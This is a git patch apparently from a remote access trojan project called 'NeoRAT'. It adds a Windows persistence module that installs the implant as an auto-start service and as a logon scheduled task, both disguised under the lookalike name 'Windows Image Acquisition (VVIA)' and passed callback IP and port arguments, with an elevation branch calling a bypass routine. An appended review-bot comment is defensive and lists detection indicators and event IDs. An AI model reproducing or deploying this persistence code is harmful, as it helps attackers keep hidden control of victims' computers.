From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT
---
foreign/client_handling/persistence.py | 19 +++++++++++++++++++
1 file changed, 19 insertions(+)
create mode 100644 foreign/client_handling/persistence.py
(limited to 'foreign/client_handling/persistence.py')
diff --git a/foreign/client_handling/persistence.py b/foreign/client_handling/persistence.py
new file mode 100644
index 0000000..bc81084
--- /dev/null
+++ b/foreign/client_handling/persistence.py
@@ -0,0 +1,19 @@
+from foreign.privileges.win_privileges import *
+from foreign.utility.terminal_pipe import *
+from foreign.global_state import *
+
+
+def persistence(action_type, extra_data):
+ arguments = f' -ip {state["ip"]} -p {state["port"]}'
+
+ if action_type == 'elevate':
+ return bypass(state['file'], arguments)
+ elif action_type == 'service':
+ try:
+ terminal_pipe(f'sc delete "Windows Image Acquisition (VVIA)"', extra_data[0], extra_data[1])
+ finally:
+ return {'message': terminal_pipe(f'sc create "Windows Image Acquisition (VVIA)" binpath= "{state["file"]}{arguments}" start= "auto"', extra_data[0], extra_data[1])}
+ elif action_type == 'schedule':
+ return {'message': terminal_pipe(f'schtasks /Create /SC ONLOGON /TN "Windows Image Acquisition (VVIA)" /TR "{state["file"]}{arguments}" /F', extra_data[0], extra_data[1])}
+ else:
+ raise Exception('Error message')
\ No newline at end of file
--
cgit v1.2.3
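Review bot: `persistence()` is added without a docstring or comment recording what it leaves on the host. The `service` and `schedule` branches register an auto-start service and an ONLOGON task named "Windows Image Acquisition (VVIA)", which imitates the display name of the built-in "Windows Image Acquisition (WIA)" service. A header comment such as `# Host artefacts: service and logon task named "Windows Image Acquisition (VVIA)"; command line is state["file"] followed by " -ip <ip> -p <port>"` would make the indicators explicit for anyone triaging this file. Both artefacts are recorded by service-install events (System 7045, Security 4697) and scheduled-task creation events (Security 4698), so the exact name string and a binary path followed by `-ip`/`-p` arguments are usable hunting terms. The three wildcard imports also hide where `bypass`, `terminal_pipe` and `state` are defined; presumably they come from the modules listed in that order, but that needs confirming against those files.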